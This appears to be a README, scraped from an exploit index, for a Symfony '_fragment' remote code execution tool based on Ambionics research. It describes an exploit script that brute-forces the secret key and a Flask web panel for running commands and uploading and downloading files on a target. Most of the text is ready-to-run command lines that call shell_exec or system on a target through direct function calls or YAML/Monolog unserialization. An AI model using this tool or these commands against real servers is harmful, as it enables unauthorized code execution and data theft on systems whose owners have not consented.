Share
## https://sploitus.com/exploit?id=CCC89B53-A1C3-5E64-A55F-CCF4ED4A9D31
# Symfony-RCE

Exploit for the Symfony `_fragment` Remote Code Execution (RCE) vulnerability.

Based on the PoC by [Ambionics (Lexfo)](https://github.com/ambionics/symfony-exploits) and the related research article: [Symfony Secret Fragment](https://www.ambionics.io/blog/symfony-secret-fragment).

## Files

- **`exploit.py`** โ€” CLI exploitation script (discovery + exploit). Adapted from the original PoC by cfreal @ Ambionics.
- **`web.py`** โ€” Interactive web interface (Flask) to run commands, download and upload files on the target.
- **`config.json.example`** โ€” Example configuration for the web interface.

## Usage

### CLI (`exploit.py`)

```bash
# Discovery โ€” try common secrets
python3 exploit.py https://target.com/_fragment

# With a known secret
python3 exploit.py https://target.com/_fragment --secret 'CustomKey123!'

# Exploit โ€” method 1 (direct function call)
python3 exploit.py https://target.com/_fragment \
  --secret 'CustomKey123!' \
  --internal-url http://target.internal.com/_fragment \
  --method 1 \
  --function shell_exec \
  --parameters cmd:'id'

# Exploit โ€” method 2 (YAML + unserialize via Monolog)
python3 exploit.py https://target.com/_fragment \
  --secret 'CustomKey123!' \
  --internal-url http://target.internal.com/_fragment \
  --method 2 \
  --function system \
  --parameters 'id'
```

### Web interface (`web.py`)

```bash
cp config.json.example config.json
# Edit config.json with your target parameters
python3 web.py --port 5000
```

Then open `http://127.0.0.1:5000` in a browser.

## Dependencies

```bash
pip install requests flask
```